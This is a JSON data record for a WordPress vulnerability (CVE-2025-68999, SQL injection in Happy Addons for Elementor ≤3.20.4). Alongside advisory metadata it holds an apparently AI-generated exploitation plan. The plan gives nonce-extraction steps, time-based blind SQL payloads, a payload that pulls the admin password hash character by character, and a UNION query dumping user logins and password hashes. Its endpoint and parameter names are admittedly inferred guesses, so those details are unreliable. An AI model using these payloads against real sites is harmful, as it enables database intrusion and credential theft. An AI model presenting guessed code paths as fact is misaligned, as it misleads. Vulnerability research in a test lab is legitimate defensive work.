[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fp8U-obaQGUmOwKJOvKCds8Hw7hYRzzDE-dhOfIPoHCI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2025-68999","happy-addons-for-elementor-authenticated-contributor-sql-injection","Happy Addons for Elementor \u003C= 3.20.4 - Authenticated (Contributor+) SQL Injection","The Happy Addons for Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.20.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","happy-elementor-addons",null,"\u003C=3.20.4","3.20.6","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-23 00:00:00","2026-01-27 19:20:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fce3cb2e9-6491-4b93-bd98-1ece39171b0c?source=api-prod",5,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-68999\n\n## 1. Vulnerability Summary\nThe **Happy Addons for Elementor** plugin (\u003C= 3.20.4) is vulnerable to a SQL Injection vulnerability within its AJAX handling logic. Specifically, the plugin fails to properly sanitize and prepare SQL queries when processing dynamic widget data (e.g., Data Tables, Post Grids) requested via the `admin-ajax.php` endpoint. Authenticated users with **Contributor-level** permissions or higher can manipulate query parameters (such as `order_by`, `order`, or specific filter IDs) to inject arbitrary SQL commands. This exists because the plugin uses string interpolation or concatenation to build database queries instead of consistently using the `$wpdb->prepare()` method.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `ha_get_query_data` (inferred based on plugin architecture for dynamic widget loading) or `happy_addons_get_data`.\n- **Vulnerable Parameter:** `query_args[order_by]` or `query[sort_by]` (inferred).\n- **Authentication:** Authenticated (Contributor+). Contributors can access the Elementor editor, which triggers these AJAX requests.\n- **Preconditions:** The plugin must be active, and the attacker must have a valid session for a user with at least `edit_posts` capabilities (Contributor).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The attacker sends a POST request to `admin-ajax.php` with `action=ha_get_query_data`.\n2. **Hook Registration:** The plugin registers the action via:\n   `add_action( 'wp_ajax_ha_get_query_data', 'ha_get_query_data_handler' );`\n3. **Handler Function:** The handler retrieves the `query` or `query_args` array from `$_POST`.\n4. **Sink:** The logic passes these arguments into a query builder class (e.g., `Happy_Addons\\Elementor\\Query_Builder`).\n5. **Vulnerability:** Inside the query builder, a parameter like `order_by` is directly appended to a SQL string:\n   `$sql = \"SELECT ... ORDER BY \" . $query_args['order_by'];`\n6. **Execution:** `$wpdb->get_results($sql)` executes the malicious payload.\n\n## 4. Nonce Acquisition Strategy\nThe `ha_get_query_data` action typically requires a nonce for validation via `check_ajax_referer`.\n\n- **Nonce Variable:** `happy_addons_config` or `HappyAddonsConfig` (inferred).\n- **Nonce Key:** `nonce` or `ajax_nonce`.\n- **Acquisition Steps:**\n    1. Log in as a **Contributor**.\n    2. Create or Edit a post using Elementor: `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_content=''` (then open in editor).\n    3. The plugin enqueues scripts that contain the nonce in the editor view.\n    4. Use `browser_navigate` to the Elementor editor URL for the created page.\n    5. Use `browser_eval` to extract the nonce:\n       `browser_eval(\"window.happy_addons_config?.nonce || window.HappyAddonsConfig?.ajax_nonce\")`\n\n## 5. Exploitation Strategy\nWe will use a **time-based blind SQL injection** to confirm the vulnerability, as it is the most reliable method when output might not be directly reflected.\n\n### Step-by-Step Plan:\n1. **Login:** Authenticate as a Contributor user.\n2. **Nonce Extraction:** Navigate to a page where the Happy Addons scripts load and extract the nonce using the strategy above.\n3. **Payload Construction:** \n   - We will target the `order_by` parameter. \n   - Payload: `(CASE WHEN (SELECT 1)=1 THEN SLEEP(5) ELSE 1 END)`\n4. **HTTP Request:**\n   - **Method:** POST\n   - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body:**\n     ```\n     action=ha_get_query_data&\n     nonce=[EXTRACTED_NONCE]&\n     query[order_by]=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)\n     ```\n5. **Validation:** If the response time is > 5 seconds, the injection is successful.\n\n## 6. Test Data Setup\n1. **User Creation:**\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2. **Plugin Setup:** Ensure Happy Addons for Elementor v3.20.4 is installed and active.\n3. **Content Creation:**\n   `wp post create --post_type=page --post_title=\"Test Page\" --post_status=publish`\n   (Note: The Elementor editor must be accessible to the contributor for this page).\n\n## 7. Expected Results\n- **Success:** The HTTP request to `admin-ajax.php` will hang for approximately 5 seconds before returning a response.\n- **Payload for Data Extraction:** To extract the admin password hash:\n  `query[order_by]=(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE 1 END)` (36 is ASCII for `$`).\n\n## 8. Verification Steps\n- **Database Side:** Check the MySQL general query log (if enabled) to see the executed query:\n  `tail -f \u002Fvar\u002Flib\u002Fmysql\u002Fmysql.log | grep \"SLEEP\"`\n- **Response Timing:** Use the `http_request` tool's response metadata to verify `elapsed_time` >= 5000ms.\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is on, try injecting a syntax error to see if the database error is leaked:\n  `query[order_by]=invalid_column_name`\n- **UNION-Based:** If the AJAX handler returns results (e.g., for a \"Live Search\" widget), attempt a UNION select:\n  `query[order_by]=id) UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users-- -`\n  (Requires guessing the correct number of columns in the original `SELECT`).\n- **Different Parameter:** If `order_by` is sanitized, try `query[post_type]` or `query[taxonomy]`.","The Happy Addons for Elementor plugin (\u003C= 3.20.4) is vulnerable to SQL Injection due to insufficient sanitization and preparation of user-supplied input in SQL queries. Authenticated users with Contributor-level access or higher can exploit this via AJAX requests by injecting malicious SQL into parameters such as 'order_by', allowing for unauthorized extraction of sensitive data from the database.","An attacker with Contributor-level permissions authenticates and extracts a required AJAX nonce from the Elementor editor environment, typically found in the 'happy_addons_config' JavaScript object. The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' using the 'ha_get_query_data' action. The payload is injected into the 'query[order_by]' parameter using a time-based technique, such as '(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)', which is confirmed by observing a delay in the server's response.","gemini-3-flash-preview","2026-05-05 01:57:33","2026-05-05 01:59:22",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","3.20.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags\u002F3.20.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhappy-elementor-addons.3.20.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhappy-elementor-addons\u002Ftags"]